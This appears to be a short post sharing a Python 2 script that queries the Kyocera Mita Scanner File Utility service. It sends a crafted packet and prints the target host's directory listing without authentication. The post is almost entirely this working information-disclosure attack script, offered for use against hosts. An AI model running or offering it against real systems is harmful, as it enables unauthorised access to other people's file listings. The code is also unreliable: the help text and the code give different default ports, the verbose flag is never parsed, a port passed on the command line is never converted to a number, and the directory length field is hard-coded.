Kyocera Mita Scanner File Utility Query

I wrote this little script to pull directory listings from hosts running the Kyocera Mita Scanner File Utility.

I don't know if all Mita Scanner File Utilities are vulnerable to this, but it looks sexier then my crappy script :)

root@bt:~ # cat kyocera_check.py
#!/usr/bin/env python
# Cheapo check for Kyocera Mita File Utilities, pulls dir info from them
#
#
# Based off the of NASL defined here:
# http://www.nessus.org/plugins/index.php?view=single&id=34117
# by brad a.
import binascii
import getopt
import socket
import sys

def usage():
        help = "Options:\n"
        help += "\t-h <host>\tTarget host\n"
        help += "\t-p <port>\tPort (Default 31700)"
        help += "\t-d <dir>\t Directory (Default c:\\)"
        help += "\t-v\tverbose"
        return help

def parse_resp(recv_data):

        dirlist = binascii.hexlify(recv_data)

        count = 1

        offset = 20 # size of header

        count = offset
        newword=1
        print "[+]Found the Following Contents:"
        while(count<len(dirlist)):
                filename=""
                word_length = int(dirlist[count:count+2],16)
                #print "next word is",word_length,"characters long"
                count+=2
                char_count=1
                while(char_count<=word_length):
                        filename += binascii.unhexlify(dirlist[count:count+2])
                        char_count+=1
                        count+=2
                print "\t",filename




def main():
        print "Kyocera Mita Scanner File Utility Query"
        print "by brad a."
        print "----------------------------------------"

        try:
                opts, args = getopt.getopt(sys.argv[1:], "h:p:d:",[])
        except getopt.GetoptError:
                print usage()
                return

        port = 37100
        directory = "c:\\"
        host = verbose = 0

        for o,a in opts:
                if o == "-h":
                        host = a
                if o == "-p":
                        port = a
                if o == "-d":
                        directory = a

        if (host == 0):
                print usage()
                return


        s = socket.socket()
        s.settimeout(2)
        recv_data = 0

        print '[+] Targeting',host,':',port

        s.connect((host,port))

        try:
                recv_data = s.recv(1024)
        except socket.timeout:
                print "[ALERT] Client timed out!"

        if recv_data:
                if verbose:
                        print '[+] Got Banner:', recv_data
                        print '[+] in hex:', binascii.hexlify(recv_data)

                req = '3801' # header
                req += "%04x" % 4
                req += binascii.hexlify(directory)
                datahex = "%04x" % len(binascii.unhexlify(req))
                datahex += req



                if verbose:
                        print '[+] To send:'
                        print '[+] H:',datahex
                        #print '[+] A:',binascii.unhexlify(datahex)


                error = s.sendall(binascii.unhexlify(datahex))

                if error:
                        print "[!] Error:",error
                else:
                        try:
                                recv_data = s.recv(1024)
                        except socket.timeout:
                                print "[ALERT] Timeout!"
                                return

                        if recv_data:
                                if verbose:
                                        print '[+] Got response:'
                                        print '[+] H:', binascii.hexlify(recv_data)
                                        #print '[+] A:', recv_data

                                parse_resp(recv_data)



        else:
                print "[ALERT] Didn't Find banner!"

        s.shutdown(2)
        s.close()
main()